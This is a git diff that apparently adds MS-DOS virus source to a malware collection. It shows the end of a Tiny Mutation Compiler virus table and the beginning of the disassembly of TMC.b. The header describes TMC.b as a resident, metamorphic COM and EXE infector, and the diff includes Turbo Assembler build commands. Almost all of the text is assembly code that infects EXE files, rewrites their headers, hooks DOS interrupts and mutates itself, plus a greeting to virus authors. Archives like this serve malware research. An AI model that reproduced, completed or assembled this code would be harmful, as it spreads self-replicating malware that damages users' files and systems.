Three bytes instruction + + mov ax,5701h ; Set file's date and time + + db 04h ; Four bytes instruction + + mov cx,ds:[1234h] ; CX = new time + + db 11101101b ; Data reference + dw 12ch ; Pointer to file_time + db 04h ; Four bytes instruction + + mov dx,ds:[1234h] ; DX = new date + + db 11101101b ; Data reference + dw 12dh ; Pointer to file_date + db 02h ; Two bytes instruction + + int 21h + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0fah ; Pointer to close_file + db 11101111b ; End of block +close_file db 11101110b ; Beginning of block + dw 0fah ; Block identification of close_file + db 02h ; Two bytes instruction + + mov ah,3eh ; Close file + + db 02h ; Two bytes instruction + + int 21h + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 1771h ; Pointer to infect_exit + db 11101111b ; End of block +infect_exit db 11101110b ; Beginning of block + dw 1771h ; Block identification of infect_exit + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 13a5h ; Pointer to int24_load + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0fbh ; Pointer to infect_exit_ + db 11101111b ; End of block +infect_exit_ db 11101110b ; Beginning of block + dw 0fbh ; Block identification of infect_e... + db 01h ; One byte instruction + + ret ; Return + + db 11101111b ; End of block +infect_exe db 11101110b ; Beginning of block + dw 138dh ; Block identification of infect_exe + db 01h ; One byte instruction + + inc cx ; EXE executable + + db 04h ; Four bytes instruction + + mov ds:[1234h],cl ; Store executable status + + db 11101101b ; Data reference + dw 1388h ; Pointer to executa_sta + db 02h ; Two bytes instruction + + or dx,dx ; Too small in filesize? + + db 01110101b+10000000b ; Not zero? Jump to exam_filesiz + dw 13aeh ; Pointer to exam_filesiz + db 03h ; Three bytes instruction + + cmp ax,2710h ; Too small in filesize? + + db 01110010b+10000000b ; Below? Jump to close_file + dw 0fah ; Pointer to close_file + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 13aeh ; Pointer to exam_filesiz + db 11101111b ; End of block +exam_filesiz db 11101110b ; Beginning of block + dw 13aeh ; Block identification of exam_fil... + db 03h ; Three bytes instruction + + cmp dx,06h ; Too large in filesize? + + db 01110111b+10000000b ; Above? Jump to close_file + dw 0fah ; Pointer to close_file + db 01h ; One byte instruction + + push ax ; Save AX at stack + + db 01h ; One byte instruction + + push dx ; Save DX at stack + + db 03h ; Three bytes instruction + + mov cx,200h ; Divide by pages + + db 02h ; Two bytes instruction + + div cx ; DX:AX = filesize in pages + + db 01h ; One byte instruction + + inc ax ; Increase total number of 512-byt... + + db 03h ; Three bytes instruction + + cmp [si+04h],ax ; Internal overlay? + + db 01h ; One byte instruction + + pop dx ; Load DX from stack + + db 01h ; One byte instruction + + pop ax ; Load AX from stack + + db 01110101b+10000000b ; Not equal? Jump to close_file + dw 0fah ; Pointer to close_file + db 01h ; One byte instruction + + push ax ; Save AX at stack + + db 01h ; One byte instruction + + push dx ; Save DX at stack + + db 02h ; Two bytes instruction + + xor ax,ax ; Zero AX + + db 04h ; Four bytes instruction + + cmp [si+0ch],0ffffh ; Maximum paragraphs to allocate ...? + + db 01110100b+10000000b ; Equal? Jump to maximum_mem + dw 1399h ; Pointer to maximum_mem + db 03h ; Three bytes instruction + + mov ax,[si+04h] ; AX = total number of 512-byte pa... + + db 01h ; One byte instruction + + inc ax ; Increase total number of 512-byt... + + db 02h ; Two bytes instruction + + mov cl,05h ; Divide by thirty-two + + db 02h ; Two bytes instruction + + shl ax,cl ; AX = total number of 512-byte pa... + + db 03h ; Three bytes instruction + + sub ax,[si+08h] ; Subtract header size in paragrap... + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 1399h ; Pointer to maximum_mem + db 11101111b ; End of block +maximum_mem db 11101110b ; Beginning of block + dw 1399h ; Block identification of maximum_mem + db 03h ; Three bytes instruction + + add ax,[si+0ch] ; Add maximum paragraphs to alloca... + + db 03h ; Three bytes instruction + + mov ds:[1234h],ax ; Store size of memory block in pa... + + db 11101101b ; Data reference + dw 1395h ; Pointer to mcb_size__ + db 03h ; Three bytes instruction + + mov ax,[si+0eh] ; AX = initial SS relative to star... + + db 03h ; Three bytes instruction + + mov ds:[1234h],ax ; Store initial SS relative to sta... + + db 11101101b ; Data reference + dw 138ah ; Pointer to initial_ss_ + db 03h ; Three bytes instruction + + mov ax,[si+10h] ; AX = initial SP + + db 03h ; Three bytes instruction + + mov ds:[1234h],ax ; Store initial SP + + db 11101101b ; Data reference + dw 138ch ; Pointer to initial_sp_ + db 03h ; Three bytes instruction + + mov ax,[si+14h] ; AX = initial IP + + db 03h ; Three bytes instruction + + mov ds:[1234h],ax ; Store initial IP + + db 11101101b ; Data reference + dw 138bh ; Pointer to initial IP + db 03h ; Three bytes instruction + + mov ds:[1234h],ax ; Store initial IP + + db 11101101b ; Data reference + dw 1773h ; Pointer to incorrec_ip + db 03h ; Three bytes instruction + + mov ax,[si+16h] ; AX = initial CS relative to star... + + db 03h ; Three bytes instruction + + mov ds:[1234h],ax ; Store initial CS relative to sta... + + db 11101101b ; Data reference + dw 1389h ; Pointer to initial_cs_ + db 01h ; One byte instruction + + pop dx ; Load DX from stack + + db 01h ; One byte instruction + + pop ax ; Load AX from stack + + db 01h ; One byte instruction + + push ax ; Save AX at stack + + db 01h ; One byte instruction + + push dx ; Save DX at stack + + db 05h ; Five bytes instruction + + mov [si+0ch],0ffffh ; Store maximum paragraphs to allo... + + db 05h ; Five bytes instruction + + mov [si+10h],7ffeh ; Store initial SP + + db 05h ; Five bytes instruction + + mov word ptr [si+14h],00h + + db 03h ; Three bytes instruction + + mov cx,10h ; Divide by paragraphs + + db 02h ; Two bytes instruction + + div cx ; DX:AX = filesize in paragraphs + + db 03h ; Three bytes instruction + + sub ax,[si+08h] ; Subtract header size in paragrap... + + db 01h ; One byte instruction + + inc ax ; Increase initial CS/SS relative ... + + db 03h ; Three bytes instruction + + mov [si+0eh],ax ; Store initial SS relative to sta... + + db 03h ; Three bytes instruction + + mov [si+16h],ax ; Store initial CS relative to sta... + + db 03h ; Three bytes instruction + + mov ax,[si+04h] ; AX = total number of 512-byte pa... + + db 01h ; One byte instruction + + inc ax ; Increase total number of 512-byt... + + db 02h ; Two bytes instruction + + mov cl,05h ; Divide by thirty-two + + db 02h ; Two bytes instruction + + shl ax,cl ; AX = total number of 512-byte pa... + + db 03h ; Three bytes instruction + + sub ax,[si+08h] ; Subtract header size in paragrap... + + db 03h ; Three bytes instruction + + add ax,[si+0ah] ; Add maximum paragraphs to alloca... + + db 02h ; Two bytes instruction + + mov di,ax ; DI = minimum paragraphs to alloc... + + db 01h ; One byte instruction + + pop cx ; Load CX from stack (DX) + + db 01h ; One byte instruction + + pop dx ; Load DX from stack (AX) + + db 03h ; Three bytes instruction + + and dx,1111111111110000b + + db 03h ; Three bytes instruction + + add dx,10h ; DX = low-order word of offset fr... + + db 03h ; Three bytes instruction + + adc cx,00h ; CX = high-order word of offset f... + + db 03h ; Three bytes instruction + + mov ax,4200h ; Set current file position (SOF) + + db 02h ; Two bytes instruction + + int 21h + + db 03h ; Three bytes instruction + + add ax,1234h ; AX = length of virus + + db 11101101b ; Data reference + dw 66h ; Pointer to virus_end + db 03h ; Three bytes instruction + + adc dx,00h ; Convert to 32-bit + + db 03h ; Three bytes instruction + + mov cx,200h ; Divide by pages + + db 02h ; Two bytes instruction + + div cx ; DX:AX = filesize in pages + + db 03h ; Three bytes instruction + + mov [si+02h],dx ; Store number of bytes in last 51... + + db 03h ; Three bytes instruction + + add dx,0ffffh ; Add sixty-five thousand five hun... + + db 03h ; Three bytes instruction + + adc ax,00h ; Convert to 32-bit + + db 03h ; Three bytes instruction + + mov [si+04h],ax ; Store total number of 512-byte p... + + db 05h ; Five bytes instruction + + mov [si+0ah],800h ; Store minimum paragraphs of memo... + + db 01h ; One byte instruction + + inc ax ; Store total number of 512-byte p... + + db 02h ; Two bytes instruction + + mov cl,05h ; Divide by thirty-two + + db 02h ; Two bytes instruction + + shl ax,cl ; AX = total number of 512-byte pa... + + db 03h ; Three bytes instruction + + sub ax,[si+08h] ; Subtract header size in paragrap... + + db 03h ; Three bytes instruction + + add ax,[si+0ah] ; Add maximum paragraphs to alloca... + + db 03h ; Three bytes instruction + + mov ds:[1234h],ax ; Store new size in paragraphs + + db 11101101b ; Data reference + dw 1393h ; Pointer to new_mcb_siz + db 02h ; Two bytes instruction + + sub di,ax ; DI = additional minimum paragrap... + + db 01110110b+10000000b ; Below or equal? Jump to dont_add... + dw 1396h ; Pointer to dont_add_mem + db 03h ; Three bytes instruction + + add [si+0ah],di ; Add additional minimum paragraph... + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 1396h ; Pointer to dont_add_mem + db 11101111b ; End of block +dont_add_mem db 11101110b ; Beginning of block + dw 1396h ; Block identification of dont_add... + db 03h ; Three bytes instruction + + mov ax,14h ; AX = probability of storing inco... + + db 04h ; Four bytes instruction + + cmp ds:[1234h],ax ; Store incorrect IP? + + db 11101101b ; Data reference + dw 0bech ; Pointer to probability_ + db 03h ; Three bytes instruction + + mov ax,00h ; ADD [BX+SI],AL (opcode 00h,00h) + + db 01110111b+10000000b ; Above? Jump to write_virus + dw 138eh ; Pointer to write_virus + db 03h ; Three bytes instruction + + mov bp,10h ; Random number within sixteen + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0bd5h ; Pointer to rnd_in_rang + db 02h ; Two bytes instruction + + sub al,08h ; Subtract eight from random number + + db 03h ; Three bytes instruction + + mov di,1234h ; DI = offset of incorrec_ip + + db 11101101b ; Data reference + dw 1773h ; Pointer to incorrec_ip + db 03h ; Three bytes instruction + + add [di+01h],al ; Add random number to incorrect IP + + db 06h ; Six bytes instruction + + mov ds:[00h],1110110100110011b + + db 03h ; Three bytes instruction + + mov ax,1001000010010000b + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 138eh ; Pointer to write_virus + db 11101111b ; End of block +int24_virus db 11101110b ; Beginning of block + dw 1770h ; Block identification of int24_virus + db 02h ; Two bytes instruction + + mov al,03h ; Fail system call in progress + + db 01h ; One byte instruction + + iret ; Interrupt return + + db 11101111b ; End of block +int24_store db 11101110b ; Beginning of block + dw 13a4h ; Block identification of int24_store + db 01h ; One byte instruction + + push dx ; Save DX at stack + + db 01h ; One byte instruction + + push ds ; Save DS at stack + + db 01h ; One byte instruction + + push es ; Save ES at stack + + db 01h ; One byte instruction + + push cs ; Save CS at stack + + db 01h ; One byte instruction + + pop ds ; Load DS from stack (CS) + + db 03h ; Three bytes instruction + + mov ax,3524h ; Get interrupt vector 24h + + db 02h ; Two bytes instruction + + int 21h + + db 04h ; Four bytes instruction + + mov ds:[1234h],es ; Store segment of interrupt 24h + + db 11101101b ; Data reference + dw 13a2h ; Pointer to int24_seg + db 04h ; Four bytes instruction + + mov ds:[1234h],bx ; Store offset of interrupt 24h + + db 11101101b ; Data reference + dw 13a3h ; Pointer to int24_off + db 03h ; Three bytes instruction + + mov dx,1234h ; DX = offset of int24_virus + + db 11101101b ; Data reference + dw 1770h ; Pointer to int24_virus + db 03h ; Three bytes instruction + + mov ax,2524h ; Set interrupt vector 24h + + db 02h ; Two bytes instruction + + int 21h + + db 01h ; One byte instruction + + pop es ; Load ES from stack + + db 01h ; One byte instruction + + pop ds ; Load DS from stack + + db 01h ; One byte instruction + + pop dx ; Load DX from stack + + db 01h ; One byte instruction + + ret ; Return + + db 11101111b ; End of block +int24_load db 11101110b ; Beginning of block + dw 13a5h ; Block identification of int24_load + db 01h ; One byte instruction + + push ds ; Save DS at stack + + db 05h ; Five bytes instruction + + mov dx,cs:[1234h] ; DX = offset of interrupt 24h + + db 11101101b ; Data reference + dw 13a3h ; Pointer to int24_off + db 05h ; Five bytes instruction + + mov ds,cs:[1234h] ; DS = segment of interrupt 24h + + db 11101101b ; Data reference + dw 13a2h ; Pointer to int24_seg + db 03h ; Three bytes instruction + + mov ax,2524h ; Set interrupt vector 24h + + db 02h ; Two bytes instruction + + int 21h + + db 01h ; One byte instruction + + pop ds ; Load DS from stack + + db 01h ; One byte instruction + + ret ; Return + + db 11101111b ; End of block +push_regs db 11101110b ; Beginning of block + dw 13a0h ; Block identification of push_regs + db 05h ; Five bytes instruction + + pop cs:[1234h] ; Load 16-bit immediate from stack + + db 11101101b ; Data reference + dw 13aah ; Pointer to imm16 + db 01h ; One byte instruction + + push ax ; Save AX at stack + + db 01h ; One byte instruction + + push bx ; Save BX at stack + + db 01h ; One byte instruction + + push cx ; Save CX at stack + + db 01h ; One byte instruction + + push dx ; Save DX at stack + + db 01h ; One byte instruction + + push si ; Save SI at stack + + db 01h ; One byte instruction + + push di ; Save DI at stack + + db 01h ; One byte instruction + + push bp ; Save BP at stack + + db 01h ; One byte instruction + + push ds ; Save DS at stack + + db 01h ; One byte instruction + + push es ; Save ES at stack + + db 05h ; Five bytes instruction + + jmp cs:[1234h] + + db 11101101b ; Data reference + dw 13aah ; Pointer to imm16 + db 11101111b ; End of block +pop_regs db 11101110b ; Beginning of block + dw 13a1h ; Block identification of pop_regs + db 05h ; Five bytes instruction + + pop cs:[1234h] ; Load 16-bit immediate from stack + + db 11101101b ; Data reference + dw 13aah ; Pointer to imm16 + db 01h ; One byte instruction + + pop es ; Load ES from stack + + db 01h ; One byte instruction + + pop ds ; Load DS from stack + + db 01h ; One byte instruction + + pop bp ; Load BP from stack + + db 01h ; One byte instruction + + pop di ; Load DI from stack + + db 01h ; One byte instruction + + pop si ; Load SI from stack + + db 01h ; One byte instruction + + pop dx ; Load DX from stack + + db 01h ; One byte instruction + + pop cx ; Load CX from stack + + db 01h ; One byte instruction + + pop bx ; Load BX from stack + + db 01h ; One byte instruction + + pop ax ; Load AX from stack + + db 05h ; Five bytes instruction + + jmp cs:[1234h] + + db 11101101b ; Data reference + dw 13aah ; Pointer to imm16 + db 11101111b ; End of block +int21_addr db 11101110b ; Beginning of block + dw 0c9h ; Block identification of int21_addr + db 04h+10h ; Four bytes data + dd 00h ; Address of interrupt 21h + db 11101111b ; End of block +int21_seg db 11101110b ; Beginning of block + dw 13a2h ; Block identification of int24_seg + db 02h+10h ; Two bytes data + dw 00h ; Segment of interrupt 24h + db 11101111b ; End of block +int21_off db 11101110b ; Beginning of block + dw 13a3h ; Block identification of int24_off + db 02h+10h ; Two bytes data + dw 00h ; Offset of interrupt 24h + db 11101111b ; End of block +imm16 db 11101110b ; Beginning of block + dw 13aah ; Block identification of imm16 + db 02h+10h ; Two bytes data + dw 00h ; 16-bit immediate + db 11101111b ; End of block +exe_header db 11101110b ; Beginning of block + dw 138fh ; Block identification of exe_header + db 18h+10h ; Twenty-four bytes data + db 18h dup(00h) ; EXE header + db 11101111b ; End of block +timer_ticks db 11101110b ; Beginning of block + dw 13adh ; Block identification of timer_ticks + db 02h+10h ; Two bytes data + dw 00h ; Timer ticks since midnight + db 11101111b ; End of block +file_time db 11101110b ; Beginning of block + dw 12ch ; Block identification of file_time + db 02h+10h ; Two bytes data + dw 00h ; File time + db 11101111b ; End of block +file_date db 11101110b ; Beginning of block + dw 12dh ; Block identification of file_date + db 02h+10h ; Two bytes data + dw 00h ; File date + db 11101111b ; End of block +progra_seg db 11101110b ; Beginning of block + dw 139fh ; Block identification of progra_seg + db 02h+10h ; Two bytes data + dw 00h ; Segment of PSP for current process + db 11101111b ; End of block +file_handle db 11101110b ; Beginning of block + dw 139dh ; Block identification of file_handle + db 02h+10h ; Two bytes data + dw 00h ; File handle + db 11101111b ; End of block +filename db 11101110b ; Beginning of block + dw 139eh ; Block identification of filename + db (filena_end-filena_begin)+10h +filena_begin: + db 07h dup(00h,01h,02h,03h,04h,05h,06h,07h,08h,09h,0ah) +filena_end: + db 11101111b ; End of block +message db 11101110b ; Beginning of block + dw 2328h ; Block identification of message + db (message_end-messag_begin)+10h +messag_begin db 0dh,0ah + db 0dh,0ah + db ' TMC 1.0 by Ender ',0dh,0ah + db 'Welcome to the Tiny Mutation Compiler!',0dh,0ah + db 'Dis is level 6*9.',0dh,0ah + db 'Greetings to virus makers: Dark Avenger, Vyvojar, SVL, Hell Angel',0dh,0ah + db 'Personal greetings: K. K., Dark Punisher',0dh,0ah + db 0dh,0ah +message_end: + db 11101111b ; End of block + db 00h ; End of table +table_end: +code_end: + +end code_begin \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.tmc_b.asm b/MSDOS/Virus.MSDOS.Unknown.tmc_b.asm new file mode 100644 index 00000000..da15888b --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tmc_b.asm @@ -0,0 +1,4284 @@ +comment * + TMC.b + Disassembly by + Super/29A and Darkman/29A + + + + TMC.b is a 4780 bytes resident appending COM and EXE virus. Infects at load + and/or execute program, rename file and open file. TMC.b has an error + handler, retro structures and is metamorphic in file and memory using Tiny + Mutation Compiler v 1.00 [TMC]. + + To compile TMC.b with Turbo Assembler v 5.0 type: + TASM /M TMC_B.ASM + TLINK /x TMC_B.OBJ + EXE2BIN TMC_B.EXE TMC_B.COM +* + +.model tiny +.code + +code_begin: + mov bp,100h ; BP = delta offset + + cld ; Clear direction flag + mov ax,ds ; AX = segment of PSP for current ... + mov [bp+program_seg],ax ; Store segment of PSP for current... + + dec ax ; AX = segment of current Memory C... + mov ds,ax ; DS = segment of current Memory C... + mov ax,ds:[03h] ; AX = size of memory block in par... + + cmp ax,1900h ; Insufficient memory? + jae resize_mem ; Above or equal? Jump to resize_mem + + jmp terminate +resize_mem: + push cs ; Save CS at stack + pop ds ; Load DS from stack (CS) + + mov [bp+mcb_size_],ax ; Store size of memory block in p... + + mov bx,[bp+new_mcb_size] + mov ah,4ah ; Resize memory block + int 21h + jnc allocate_mem ; No error? Jump to allocate_mem + + jmp terminate +allocate_mem: + mov ah,48h ; Allocate memory + + mov bx,[bp+mcb_size_] ; BX = size of memory block in par... + sub bx,[bp+new_mcb_size] + dec bx ; BX = number of paragraphs to all... + cmp bx,0c00h ; Insufficient memory? + jae allocat_mem ; Above or equal? Jump to allocat_... + + jmp terminate +allocat_mem: + int 21h + jnc initiali_tmc ; No error? Jump to initiali_tmc + + jmp terminate +initiali_tmc: + mov es,ax ; ES = segment of allocated memory + mov es:[01h],0deadh ; Store 16-bit random number + mov word ptr es:[0ch],00h + mov es:[04h],1000h ; Store offset of block information + mov es:[06h],2000h ; Store offset of CALL; JMP; Jcc i... + mov es:[08h],3000h ; Store offset of data information + + lea si,[bp+tmc_table] ; SI = offset of tmc_table + + push si ; Save SI at stack + + mov bx,4000h ; BX = offset of next virus genera... + + jmp initial_tmc +initial_tmc: + mov di,10h ; DI = offset of table of blocks + xor ax,ax ; Zero AX + + jmp tmc_ini_loop +tmc_ini_loop: + add si,ax ; SI = offset of block or instruct... + call decrypt_byte + or al,al ; End of table? + jz calc_blocks ; Zero? Jump to calc_blocks + nop + nop + nop + + cmp al,11101000b ; CALL; JMP; Data reference; Jcc? + jae exam_block ; Above or equal? Jump to exam_block + nop + nop + nop + + cmp al,10h ; Data? + jbe tmc_ini_loop ; Below or equal? Jump to tmc_ini_... + nop + nop + nop + + sub al,10h ; AL = length of data + + jmp tmc_ini_loop +exam_block: + cmp al,11101111b ; End of block? + jne exam_block_ ; Not equal? Jump to exam_block_ + nop + nop + nop + + mov al,00h ; Don't add anything to offset wit... + + jmp tmc_ini_loop +exam_block_: + cmp al,11101110b ; Beginning of block? + jne next_byte ; Not equal? Jump to next_byte + nop + nop + nop + + mov ax,si ; AX = offset of block identification + dec ax ; AX = offset of block within table + stosw ; Store offset of block within table + + mov ax,0ffffh ; Block is still in one part + stosw ; Store block identification + + mov ax,02h ; Add two to offset within table + + jmp tmc_ini_loop +next_byte: + mov al,02h ; Add two to offset within table + + jmp tmc_ini_loop +calc_blocks: + lea ax,[di-10h] ; AX = number of blocks multiplied... + shr ax,01h ; Divide number of blocks by two + shr ax,01h ; Divide number of blocks by two + mov es:[0ah],ax ; Store number of blocks + + xor ax,ax ; End of table + stosw ; Store end of table + + mov di,10h ; DI = offset of table of blocks + mov si,es:[di] ; SI = offset of block within table + + jmp exam_bloc +split_block: + push bp ; Save BP at stack + mov bp,es:[0ah] ; BP = number of blocks + call rnd_in_range + pop bp ; Load BP from stack + + shl ax,01h ; Multiply random number with two + shl ax,01h ; Multiply random number with two + add ax,10h ; Add ten to random number + + mov di,ax ; DI = random offset within table + + jmp exam_nxt_blo +exam_nxt_blo: + add di,04h ; DI = offset of next offset withi... + + mov si,es:[di] ; SI = offset of next block within... + or si,si ; End of table? + jnz exam_block__ ; Not zero? Jump to exam_block__ + nop + nop + nop + + mov di,10h ; DI = offset of table of blocks + mov si,es:[di] ; SI = offset of block within table + + jmp exam_block__ +exam_block__: + push ax ; Save AX at stack + call decrypt_byte + dec si ; Decrease offset of block within ... + cmp al,11101111b ; End of block? + pop ax ; Load AX from stack + jne exam_bloc ; Not equal? Jump to exam_bloc + nop + nop + nop + + cmp di,ax ; End of table of blocks? + jne exam_nxt_blo ; Not equal? Jump to exam_nxt_blo + nop + nop + nop + + jmp exam_tbl_inf +exam_bloc: + mov ax,es:[di+02h] ; AX = block information + + cmp ax,0ffffh ; Block is still in one part? + je exam_bloc_ ; Equal? Jump to exam_bloc_ + nop + nop + nop + + push di ; Save DI at stack + mov di,ax ; DI = offset of end of first part... + mov al,11101001b ; JMP imm16 (opcode 0e9h) + stosb ; Store JMP imm16 + + mov ax,bx ; AX = offset within next virus ge... + dec ax ; Decrease offset within next viru... + dec ax ; Decrease offset within next viru... + sub ax,di ; Subtract offset of end of first ... + stosw ; Store 16-bit immediate + pop di ; Load DI from stack + + jmp exam_bloc_ +exam_bloc_: + call decrypt_byte + + cmp al,11101111b ; End of block? + jne exam_bloc__ ; Not equal? Jump to exam_bloc__ + + jmp end_of_block +exam_bloc__: + cmp al,10h ; Data; CALL; JMP; Data reference...? + ja exam_bloc___ ; Above? Jump to exam_bloc___ + nop + nop + nop + + push ax bp ; Save registers at stack + mov bp,[bp+probability] ; BP = probability + call rnd_in_range + or ax,ax ; Split up block? + pop bp ax ; Load registers from stack + jz split_block ; Zero? Jump to split_block_ + nop + nop + nop + + jmp exam_bloc___ +exam_bloc___: + cmp al,11101111b ; End of block? + jne exam_blo ; Not equal? Jump to exam_blo + + jmp end_of_block +exam_blo: + cmp al,11101000b ; CALL; JMP; Data reference; Jcc? + jae exam_data ; Above or equal? Jump to exam_data + nop + nop + nop + + cmp al,10h ; Data? + jbe sto_instruct ; Below or equal? Jump to sto_inst... + nop + nop + nop + + sub al,10h ; AL = length of data + + jmp sto_instruct +sto_instruct: + xor cx,cx ; Zero CX + mov cl,al ; CL = length of instruction + + push di ; Save DI at stack + mov di,bx ; DI = offset within next virus ge... + + jmp sto_ins_loop +sto_ins_loop: + call decrypt_byte + stosb ; Store byte of instruction + + dec cx ; Decrease counter + jnz sto_ins_loop ; Not zero? Jump to sto_ins_loop + nop + nop + nop + + mov bx,di ; BX = offset within next virus ge... + pop di ; Load DI from stack + + jmp exam_bloc_ +exam_data: + cmp al,11101101b ; Data reference? + jne exam_blo_ ; Not equal? Jump to exam_blo_ + nop + nop + nop + + push di ; Save DI at stack + mov di,es:[08h] ; DI = offset within data information + + mov ax,bx ; AX = offset within next virus ge... + dec ax ; Decrease offset within next viru... + dec ax ; Decrease offset within next viru... + stosw ; Store offset within next virus g... + + call decrypt_id + stosw ; Store block identification + + mov es:[08h],di ; Store offset within data informa... + pop di ; Load DI from stack + + jmp exam_bloc_ +exam_blo_: + cmp al,11101110b ; Beginning of block? + jne sto_call_jmp ; Not equal? Jump to sto_call_jmp + nop + nop + nop + + push di ; Save DI at stack + mov di,es:[04h] ; DI = offset within block informa... + + mov ax,bx ; AX = offset within next virus ge... + stosw ; Store offset within next virus ge... + + call decrypt_id + stosw ; Store block identification + + mov es:[04h],di ; Store offset within block inform... + + cmp ax,4c5h ; Block identification of tmc_table? + jne exam_message ; Not equal? Jump to exam_message + nop + nop + nop + + push si ; Save SI at stack + mov di,bx ; DI = offset within next virus ge... + lea si,[bp+tmc_table] ; SI = offset of tmc_table + mov cx,(table_end-table_begin) + rep movsb ; Move table to top of memory + + mov bx,di ; BX = offset within next virus ge... + pop si ; Load SI from stack + + jmp examine_next +exam_message: + cmp ax,2328h ; Block identification of message? + jne exam_probabi ; Not equal? Jump to exam_probabi + nop + nop + nop + + mov ax,14h ; Probability of including message + cmp [bp+probability],ax ; Include message? + jae examine_next ; Above or equal? Jump to examine_... + nop + nop + nop + + call decrypt_byte + sub al,10h ; AL = length of message + mov ah,00h ; Zero AH + add si,ax ; SI = offset of end of message + + jmp examine_next +exam_probabi: + cmp ax,0bech ; Block identification of probabi...? + jne examine_next ; Not equal? Jump to examine_next + nop + nop + nop + + mov ax,[bp+probability] ; AX = probability + dec ax ; Decrease probability + cmp ax,05h ; Probability too small? + jae store_probab ; Above or equal? Jump to store_pr... + nop + nop + nop + + mov ax,64h ; Reset probability + + jmp store_probab +store_probab: + mov es:[bx],ax ; Store probability + + add bx,02h ; Add two to offset within next vi... + add si,03h ; SI = offset of beginning of next... + + jmp examine_next +examine_next: + pop di ; Load DI from stack + + call decrypt_byte + + jmp exam_bloc___ +sto_call_jmp: + push ax di ; Save registers at stack + mov di,es:[06h] ; DI = offset within CALL; JMP; Jc... + mov ax,bx ; AX = offset within next virus ge... + stosw ; Store offset within next virus g... + + call decrypt_id + stosw ; Store block identification + + mov es:[06h],di ; Store offset within CALL; JMP; J... + pop di ax ; Load registers from stack + + mov es:[bx],al ; Store CALL imm16; JMP imm16; Jcc... + + add bx,03h ; Add three to offset within next ... + + cmp al,11110000b ; Jump condition? + jae jcc_imm8 ; Above or equal? Jump to jcc_imm8 + + jmp exam_bloc_ +jcc_imm8: + inc bx ; Increase offset within next viru... + inc bx ; Increase offset within next viru... + + jmp exam_bloc_ +split_block_: + mov es:[di+02h],bx ; Store offset within next virus g... + + add bx,03h ; Add three to offset within next ... + + jmp end_of_block +end_of_block: + dec si ; Decrease offset of block within ... + + mov es:[di],si ; Store offset of block within table + + jmp split_block +exam_tbl_inf: + cmp word ptr es:[0ch],00h + jne correct_i16 ; End of second table? Jump to cor... + nop + nop + nop + + pop si ; Load SI from stack + + mov es:[0ch],bx ; Store offset within next virus g... + + add si,(second_table-first_table) + + jmp initial_tmc +correct_i16: + push es ; Save ES at stack + pop ds ; Load DS from stack (ES) + + sub bx,4000h ; Subtract offset of next virus ge... + mov ds:[0eh],bx ; Store length of virus + + mov si,2000h ; SI = offset of CALL; JMP; Jcc im... + mov cx,ds:[06h] ; CX = offset of end of CALL; JMP;... + sub cx,si ; Subtract offset of CALL; JMP; Jc... + + shr cx,01h ; Divide number of CALL imm16; JMP... + shr cx,01h ; Divide number of CALL imm16; JMP... + + jmp jmp_call_loo +jmp_call_loo: + lodsw ; AX = offset of block within data... + push ax ; Save AX at stack + + lodsw ; AX = offset of block within data... + + push cx si ; Save registers at stack + mov si,1000h ; SI = offset of block information + mov cx,ds:[04h] ; CX = offset of end of block info... + sub cx,si ; Subtract offset of block informa... + + shr cx,01h ; Divide number of block by two + shr cx,01h ; Divide number of block by two + + jmp find_block +find_block: + cmp ax,[si+02h] ; Found block? + je found_block ; Equal? Jump to found_block + nop + nop + nop + + add si,04h ; SI = offset of next block in table + + dec cx ; Decrease counter + jnz find_block ; Not zero? Jump to find_block + nop + nop + nop +found_block: + mov dx,[si] ; DX = offset of block + + pop si cx ; Load registers from stack + pop bx ; Load BX from stack (AX) + + mov al,[bx] ; AL = first byte of instruction + cmp al,11110000b ; Jump condition? + jb sto_call_jm ; Below? Jump to sto_call_jm + nop + nop + nop + + sub byte ptr [bx],10000000b + + inc bx ; BX = offset of 8-bit immediate + + push dx ; Save DX at stack + sub dx,bx ; Subtract offset within next viru... + dec dx ; Decrease 8-bit immediate + + cmp dx,7fh ; 8-bit immediate out of range? + jg invert_jcc ; Greater? Jump to invert_jcc + nop + nop + nop + + cmp dx,0ff80h ; 8-bit immediate out of range? + jl invert_jcc ; Less? Jump to invert_jcc + nop + nop + nop + + mov [bx],dl ; Store 8-bit immediate + inc bx ; BX = offset of end of Jcc imm8 + + mov [bx],1001000010010000b + mov byte ptr [bx+02h],10010000b + pop dx ; Load DX from stack + + jmp correct_i16_ +invert_jcc: + pop dx ; Load DX from stack + + dec bx ; BX = offset of Jcc imm8 + xor byte ptr [bx],00000001b + + inc bx ; BX = offset of 8-bit immediate + mov byte ptr [bx],03h ; Store 8-bit immediate + + inc bx ; BX = offset of JMP imm16 + mov al,11101001b ; JMP imm16 (opcode 0e9h) + + jmp sto_call_jm +sto_call_jm: + mov [bx],al ; Store CALL imm16; JMP imm16 + + inc bx ; BX = offset of 16-bit immediate + sub dx,bx ; Subtract offset within next viru... + + dec dx ; Decrease 16-bit immediate + dec dx ; Decrease 16-bit immediate + + mov [bx],dx ; Store 16-bit immediate + + jmp correct_i16_ +correct_i16_: + dec cx ; Decrease counter + jnz jmp_call_loo ; Not zero? Jump to jmp_call_loo + nop + nop + nop + + mov si,3000h ; SI = offset of data information + mov cx,ds:[08h] ; CX = offset of end of data infor... + sub cx,si ; Subtract offset of data informat... + + shr cx,01h ; Divide number of data references... + shr cx,01h ; Divide number of data references... + + jmp data_ref_loo +data_ref_loo: + lodsw ; AX = offset of block within data... + push ax ; Save AX at stack + + lodsw ; AX = offset of block within data... + + push cx si ; Save registers at stack + mov si,1000h ; SI = offset of block information + mov cx,ds:[04h] ; CX = offset of end of block info... + sub cx,si ; Subtract offset of block informa... + + shr cx,01h ; Divide number of block by two + shr cx,01h ; Divide number of block by two + + jmp find_block_ +find_block_: + cmp ax,[si+02h] ; Found block? + je found_block_ ; Equal? Jump to found_block_ + nop + nop + nop + + add si,04h ; SI = offset of next block in table + + dec cx ; Decrease counter + jnz find_block_ ; Not zero? Jump to find_block_ + nop + nop + nop +found_block_: + mov ax,[si] 